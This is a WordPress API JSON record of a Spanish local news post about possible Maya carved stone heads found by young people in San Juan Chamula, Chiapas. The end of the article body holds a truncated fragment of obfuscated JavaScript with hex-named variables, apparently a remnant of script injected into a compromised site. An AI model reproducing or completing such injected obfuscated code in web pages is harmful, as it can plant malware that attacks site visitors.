{"id":24452,"date":"2025-10-10T02:13:39","date_gmt":"2025-10-10T02:13:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24452"},"modified":"2025-10-10T02:13:40","modified_gmt":"2025-10-10T02:13:40","slug":"jovenes-localizan-posibles-vestigios-mayas-en-comunidad-de-san-juan-chamula","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24452","title":{"rendered":"J\u00f3venes localizan posibles vestigios mayas en comunidad de San Juan Chamula"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"486\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000374087-1024x486.jpg\" alt=\"\" class=\"wp-image-24453\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000374087-1024x486.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000374087-300x142.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000374087-768x364.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000374087.jpg 1179w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Screenshot<\/figcaption><\/figure>\n\n\n\n<p>9 de octubre del 2025. \/ corresponsal<br>San Juan Chamula.- J\u00f3venes de la comunidad de Muk\u2019em descubrieron lo que podr\u00edan ser cabezas talladas de origen maya, mientras caminaba por cerros de aquel lugar. En un video difundido en redes sociales, se observan al menos dos piedras con rasgos similares a figuras prehisp\u00e1nicas, lo que ha despertado el inter\u00e9s y la curiosidad de pobladores y usuarios en internet.<\/p>\n\n\n\n<p>Hasta el momento no existe alg\u00fan pronunciamiento oficial de parte de quienes se encargan del temas arqueol\u00f3gicos, pero habitantes de la zona piden que se investigue el hallazgo para determinar su autenticidad y valor hist\u00f3rico.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Screenshot 9 de octubre del 2025. \/ corresponsalSan Juan Chamula.- J\u00f3venes de la comunidad de Muk\u2019em descubrieron lo que podr\u00edan ser cabezas talladas de origen maya, mientras caminaba por cerros de aquel lugar. En un video difundido en redes sociales, se observan al menos dos piedras con rasgos similares a figuras prehisp\u00e1nicas, lo que ha &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24453,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-24452","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24452","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24452"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24452\/revisions"}],"predecessor-version":[{"id":24454,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24452\/revisions\/24454"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24453"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24452"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24452"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24452"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}